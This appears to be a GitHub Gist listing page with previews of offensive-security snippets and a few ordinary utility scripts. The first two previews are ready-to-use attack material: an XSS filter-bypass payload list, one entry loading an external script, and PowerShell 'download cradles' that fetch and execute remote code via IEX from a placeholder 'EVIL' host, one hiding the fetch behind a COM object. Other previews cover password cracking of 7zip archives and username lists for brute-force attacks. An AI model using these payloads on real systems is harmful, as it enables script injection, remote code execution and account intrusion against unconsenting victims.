Skip to content

Instantly share code, notes, and snippets.

View jimmy-ly00's full-sized avatar

Jimmy jimmy-ly00

34 followers · 119 following
View GitHub Profile
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active July 27, 2025 18:47
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active September 11, 2025 03:48
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@bcoles
bcoles / 7zip-jtr.sh
Last active April 23, 2024 19:17
7zip-JTR Decrypt Script
#!/bin/bash
# 7zip-JTR Decrypt Script
#
# Clone of JTR Decrypt Scripts by synacl modified for 7zip
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
echo "7zip-JTR Decrypt Script";
if [ $# -ne 2 ]
then
@superkojiman
superkojiman / namemash.py
Last active July 18, 2025 09:24
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
@btoews
btoews / merger.py
Created May 17, 2012 16:55
Merging Nessus Files
# file: merger.py
# based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/
# by: mastahyeti
import xml.etree.ElementTree as etree
import shutil
import os
first = 1
for fileName in os.listdir("."):
@douglas
douglas / update_git_repos.sh
Created October 14, 2011 15:04
Update all git repositories under a base directory
#!/bin/bash
# store the current dir
CUR_DIR=$(pwd)
# Let the person running the script know what's going on.
echo "\n\033[1mPulling in latest changes for all repositories...\033[0m\n"
# Find all git repositories and update it to the master latest revision
for i in $(find . -name ".git" | cut -c 3-); do